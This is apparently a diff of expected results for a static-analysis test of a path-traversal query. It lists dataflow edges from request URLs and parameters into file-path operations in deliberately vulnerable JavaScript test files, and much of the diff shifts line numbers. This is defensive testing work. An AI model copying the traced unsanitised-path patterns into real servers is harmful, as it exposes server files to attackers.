TaintedPath.js:19:33:19:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:22:33:22:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:31:31:31:34 | path | provenance | | | TaintedPath.js:9:14:9:37 | url.par ... , true) | TaintedPath.js:9:14:9:43 | url.par ... ).query | provenance | Config | | TaintedPath.js:9:14:9:43 | url.par ... ).query | TaintedPath.js:9:14:9:48 | url.par ... ry.path | provenance | Config | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | TaintedPath.js:9:7:9:48 | path | provenance | | | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:9:14:9:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:15:45:15:48 | path | TaintedPath.js:15:29:15:48 | "/home/user/" + path | provenance | Config | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:42:48:42:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:46:45:46:48 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:48:51:48:54 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:50:50:50:53 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:52:52:52:55 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:54:49:54:52 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:56:48:56:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:58:54:58:57 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:60:57:60:60 | path | provenance | | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | TaintedPath.js:38:10:38:39 | url.par ... ).query | provenance | Config | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | TaintedPath.js:38:10:38:44 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:38:10:38:44 | url.par ... 
ry.path | TaintedPath.js:38:3:38:44 | path | provenance | | -| TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:38:10:38:33 | url.par ... , true) | provenance | Config | -| TaintedPath.js:42:48:42:51 | path | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:46:45:46:48 | path | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | provenance | Config | -| TaintedPath.js:48:51:48:54 | path | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:50:50:50:53 | path | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:52:52:52:55 | path | TaintedPath.js:52:29:52:56 | pathMod ... , path) | provenance | Config | -| TaintedPath.js:54:49:54:52 | path | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | provenance | Config | -| TaintedPath.js:56:48:56:51 | path | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:58:54:58:57 | path | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:60:57:60:60 | path | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | provenance | Config | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | TaintedPath.js:65:31:65:76 | require ... ).query | provenance | Config | -| TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:70 | require ... eq.url) | provenance | Config | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | TaintedPath.js:66:31:66:74 | require ... ).query | provenance | Config | -| TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:68 | require ... eq.url) | provenance | Config | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | TaintedPath.js:67:31:67:73 | require ... ).query | provenance | Config | -| TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:67 | require ... 
eq.url) | provenance | Config | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:86:44:86:47 | path | provenance | | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:87:14:87:17 | path | provenance | | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | TaintedPath.js:84:13:84:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | TaintedPath.js:84:13:84:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | TaintedPath.js:84:6:84:47 | path | provenance | | -| TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:84:13:84:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:86:44:86:47 | path | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | provenance | Config | -| TaintedPath.js:87:14:87:17 | path | TaintedPath.js:88:32:88:39 | realpath | provenance | Config | -| TaintedPath.js:88:32:88:39 | realpath | TaintedPath.js:89:45:89:52 | realpath | provenance | | -| TaintedPath.js:120:6:120:47 | path | TaintedPath.js:122:23:122:26 | path | provenance | | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | TaintedPath.js:120:13:120:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | TaintedPath.js:120:13:120:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | TaintedPath.js:120:6:120:47 | path | provenance | | -| TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:120:13:120:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:128:19:128:22 | path | provenance | | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:130:15:130:18 | path | provenance | | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | TaintedPath.js:126:14:126:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | TaintedPath.js:126:14:126:48 | url.par ... 
ry.path | provenance | Config | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | TaintedPath.js:126:7:126:48 | path | provenance | | -| TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:126:14:126:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:132:19:132:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:136:19:136:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:137:28:137:32 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:139:33:139:37 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:142:20:142:24 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:145:19:145:23 | split | provenance | | -| TaintedPath.js:130:15:130:18 | path | TaintedPath.js:130:15:130:29 | path.split("/") | provenance | Config | -| TaintedPath.js:130:15:130:29 | path.split("/") | TaintedPath.js:130:7:130:29 | split | provenance | | -| TaintedPath.js:132:19:132:23 | split | TaintedPath.js:132:19:132:33 | split.join("/") | provenance | Config | -| TaintedPath.js:136:19:136:23 | split | TaintedPath.js:136:19:136:26 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:32 | split | TaintedPath.js:137:28:137:35 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:35 | split[x] | TaintedPath.js:137:19:137:35 | prefix + split[x] | provenance | Config | -| TaintedPath.js:139:7:139:38 | concatted | TaintedPath.js:140:19:140:27 | concatted | provenance | | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | TaintedPath.js:139:7:139:38 | concatted | provenance | | -| TaintedPath.js:139:33:139:37 | split | TaintedPath.js:139:19:139:38 | prefix.concat(split) | provenance | Config | -| TaintedPath.js:140:19:140:27 | concatted | TaintedPath.js:140:19:140:37 | concatted.join("/") | provenance | Config | -| TaintedPath.js:142:7:142:39 | concatted2 | 
TaintedPath.js:143:19:143:28 | concatted2 | provenance | | -| TaintedPath.js:142:20:142:24 | split | TaintedPath.js:142:20:142:39 | split.concat(prefix) | provenance | Config | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | TaintedPath.js:142:7:142:39 | concatted2 | provenance | | -| TaintedPath.js:143:19:143:28 | concatted2 | TaintedPath.js:143:19:143:38 | concatted2.join("/") | provenance | Config | -| TaintedPath.js:145:19:145:23 | split | TaintedPath.js:145:19:145:29 | split.pop() | provenance | Config | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:154:29:154:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:160:29:160:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:161:29:161:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:162:29:162:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:163:29:163:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:178:40:178:43 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:179:50:179:53 | path | provenance | | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | TaintedPath.js:150:14:150:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | TaintedPath.js:150:14:150:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | TaintedPath.js:150:7:150:48 | path | provenance | | -| TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:150:14:150:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:154:29:154:32 | path | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:160:29:160:32 | path | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:161:29:161:32 | path | TaintedPath.js:161:29:161:53 | path.re ... 
/g, '') | provenance | Config | -| TaintedPath.js:162:29:162:32 | path | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:163:29:163:32 | path | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:178:40:178:43 | path | TaintedPath.js:178:40:178:73 | path.re ... +/, '') | provenance | Config | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | provenance | Config | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | provenance | Config | -| TaintedPath.js:179:50:179:53 | path | TaintedPath.js:179:29:179:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | provenance | Config | -| TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:45 | qs.parse(req.url) | provenance | Config | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | provenance | Config | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | provenance | Config | -| TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:38:188:58 | normali ... eq.url) | provenance | Config | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | provenance | Config | -| TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | provenance | Config | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:196:31:196:34 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:197:45:197:48 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:198:35:198:38 | path | provenance | | -| TaintedPath.js:195:14:195:37 | url.par ... 
, true) | TaintedPath.js:195:14:195:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | TaintedPath.js:195:14:195:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | TaintedPath.js:195:7:195:48 | path | provenance | | -| TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:195:14:195:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:202:7:202:48 | path | TaintedPath.js:206:29:206:32 | path | provenance | | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | TaintedPath.js:202:14:202:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | TaintedPath.js:202:14:202:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | TaintedPath.js:202:7:202:48 | path | provenance | | -| TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:202:14:202:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:206:29:206:32 | path | TaintedPath.js:206:29:206:85 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:213:29:213:32 | path | provenance | | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:216:31:216:34 | path | provenance | | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | TaintedPath.js:211:14:211:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | TaintedPath.js:211:14:211:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | TaintedPath.js:211:7:211:48 | path | provenance | | -| TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:211:14:211:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:213:29:213:32 | path | TaintedPath.js:213:29:213:68 | path.re ... 
'), '') | provenance | Config | -| TaintedPath.js:216:31:216:34 | path | TaintedPath.js:216:31:216:69 | path.re ... '), '') | provenance | Config | -| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:11:36:11:43 | filePath | provenance | | +| TaintedPath.js:13:45:13:48 | path | TaintedPath.js:13:29:13:48 | "/home/user/" + path | provenance | Config | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:39:48:39:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:42:45:42:48 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:43:51:43:54 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:44:50:44:53 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:45:52:45:55 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:46:49:46:52 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:47:48:47:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:48:54:48:57 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:49:57:49:60 | path | provenance | | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | TaintedPath.js:36:10:36:39 | url.par ... ).query | provenance | Config | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | TaintedPath.js:36:10:36:44 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | TaintedPath.js:36:3:36:44 | path | provenance | | +| TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:36:10:36:33 | url.par ... , true) | provenance | Config | +| TaintedPath.js:39:48:39:51 | path | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:42:45:42:48 | path | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | provenance | Config | +| TaintedPath.js:43:51:43:54 | path | TaintedPath.js:43:29:43:58 | pathMod ... 
ath, z) | provenance | Config | +| TaintedPath.js:44:50:44:53 | path | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:45:52:45:55 | path | TaintedPath.js:45:29:45:56 | pathMod ... , path) | provenance | Config | +| TaintedPath.js:46:49:46:52 | path | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | provenance | Config | +| TaintedPath.js:47:48:47:51 | path | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:48:54:48:57 | path | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:49:57:49:60 | path | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | provenance | Config | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | TaintedPath.js:54:31:54:76 | require ... ).query | provenance | Config | +| TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:70 | require ... eq.url) | provenance | Config | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | TaintedPath.js:55:31:55:74 | require ... ).query | provenance | Config | +| TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:68 | require ... eq.url) | provenance | Config | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | TaintedPath.js:56:31:56:73 | require ... ).query | provenance | Config | +| TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:67 | require ... eq.url) | provenance | Config | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:75:44:75:47 | path | provenance | | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:76:14:76:17 | path | provenance | | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | TaintedPath.js:73:13:73:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | TaintedPath.js:73:13:73:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:73:13:73:47 | url.par ... 
ry.path | TaintedPath.js:73:6:73:47 | path | provenance | | +| TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:73:13:73:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:75:44:75:47 | path | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | provenance | Config | +| TaintedPath.js:76:14:76:17 | path | TaintedPath.js:77:32:77:39 | realpath | provenance | Config | +| TaintedPath.js:77:32:77:39 | realpath | TaintedPath.js:78:45:78:52 | realpath | provenance | | +| TaintedPath.js:109:6:109:47 | path | TaintedPath.js:111:23:111:26 | path | provenance | | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | TaintedPath.js:109:13:109:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | TaintedPath.js:109:13:109:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | TaintedPath.js:109:6:109:47 | path | provenance | | +| TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:109:13:109:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:117:19:117:22 | path | provenance | | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:119:15:119:18 | path | provenance | | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | TaintedPath.js:115:14:115:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | TaintedPath.js:115:14:115:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | TaintedPath.js:115:7:115:48 | path | provenance | | +| TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:115:14:115:37 | url.par ... 
, true) | provenance | Config | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:121:19:121:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:125:19:125:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:126:28:126:32 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:128:33:128:37 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:131:20:131:24 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:134:19:134:23 | split | provenance | | +| TaintedPath.js:119:15:119:18 | path | TaintedPath.js:119:15:119:29 | path.split("/") | provenance | Config | +| TaintedPath.js:119:15:119:29 | path.split("/") | TaintedPath.js:119:7:119:29 | split | provenance | | +| TaintedPath.js:121:19:121:23 | split | TaintedPath.js:121:19:121:33 | split.join("/") | provenance | Config | +| TaintedPath.js:125:19:125:23 | split | TaintedPath.js:125:19:125:26 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:32 | split | TaintedPath.js:126:28:126:35 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:35 | split[x] | TaintedPath.js:126:19:126:35 | prefix + split[x] | provenance | Config | +| TaintedPath.js:128:7:128:38 | concatted | TaintedPath.js:129:19:129:27 | concatted | provenance | | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | TaintedPath.js:128:7:128:38 | concatted | provenance | | +| TaintedPath.js:128:33:128:37 | split | TaintedPath.js:128:19:128:38 | prefix.concat(split) | provenance | Config | +| TaintedPath.js:129:19:129:27 | concatted | TaintedPath.js:129:19:129:37 | concatted.join("/") | provenance | Config | +| TaintedPath.js:131:7:131:39 | concatted2 | TaintedPath.js:132:19:132:28 | concatted2 | provenance | | +| TaintedPath.js:131:20:131:24 | split | TaintedPath.js:131:20:131:39 | split.concat(prefix) | provenance | Config | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | 
TaintedPath.js:131:7:131:39 | concatted2 | provenance | | +| TaintedPath.js:132:19:132:28 | concatted2 | TaintedPath.js:132:19:132:38 | concatted2.join("/") | provenance | Config | +| TaintedPath.js:134:19:134:23 | split | TaintedPath.js:134:19:134:29 | split.pop() | provenance | Config | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:143:29:143:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:149:29:149:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:150:29:150:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:151:29:151:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:152:29:152:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:167:40:167:43 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:168:50:168:53 | path | provenance | | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | TaintedPath.js:139:14:139:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | TaintedPath.js:139:14:139:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | TaintedPath.js:139:7:139:48 | path | provenance | | +| TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:139:14:139:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:143:29:143:32 | path | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:149:29:149:32 | path | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:150:29:150:32 | path | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:151:29:151:32 | path | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:152:29:152:32 | path | TaintedPath.js:152:29:152:57 | path.re ... 
/g, '') | provenance | Config | +| TaintedPath.js:167:40:167:43 | path | TaintedPath.js:167:40:167:73 | path.re ... +/, '') | provenance | Config | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | provenance | Config | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | provenance | Config | +| TaintedPath.js:168:50:168:53 | path | TaintedPath.js:168:29:168:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | provenance | Config | +| TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:45 | qs.parse(req.url) | provenance | Config | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | provenance | Config | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | provenance | Config | +| TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:38:177:58 | normali ... eq.url) | provenance | Config | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | provenance | Config | +| TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | provenance | Config | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:185:31:185:34 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:186:45:186:48 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:187:35:187:38 | path | provenance | | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | TaintedPath.js:184:14:184:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | TaintedPath.js:184:14:184:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:184:14:184:48 | url.par ... 
ry.path | TaintedPath.js:184:7:184:48 | path | provenance | | +| TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:184:14:184:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:191:7:191:48 | path | TaintedPath.js:195:29:195:32 | path | provenance | | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | TaintedPath.js:191:14:191:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | TaintedPath.js:191:14:191:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | TaintedPath.js:191:7:191:48 | path | provenance | | +| TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:191:14:191:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:195:29:195:32 | path | TaintedPath.js:195:29:195:85 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:202:29:202:32 | path | provenance | | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:205:31:205:34 | path | provenance | | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | TaintedPath.js:200:14:200:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | TaintedPath.js:200:14:200:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | TaintedPath.js:200:7:200:48 | path | provenance | | +| TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:200:14:200:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:202:29:202:32 | path | TaintedPath.js:202:29:202:68 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:205:31:205:34 | path | TaintedPath.js:205:31:205:69 | path.re ... '), '') | provenance | Config | +| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:10:36:10:43 | filePath | provenance | | | examples/TaintedPath.js:8:18:8:41 | url.par ... 
, true) | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | provenance | Config | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | provenance | Config | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | examples/TaintedPath.js:8:7:8:52 | filePath | provenance | | | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | provenance | Config | -| examples/TaintedPath.js:11:36:11:43 | filePath | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | provenance | Config | +| examples/TaintedPath.js:10:36:10:43 | filePath | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | provenance | Config | | handlebars.js:10:51:10:58 | filePath | handlebars.js:11:32:11:39 | filePath | provenance | | | handlebars.js:13:73:13:80 | filePath | handlebars.js:15:25:15:32 | filePath | provenance | | | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:10:51:10:58 | filePath | provenance | | 
@@ -899,10 +569,10 @@ edges | tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | tainted-promise-steps.js:11:19:11:35 | await pathPromise | provenance | | | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | tainted-promise-steps.js:12:20:12:23 | path | provenance | | | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | -| tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | provenance | Config | -| tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | +| tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | 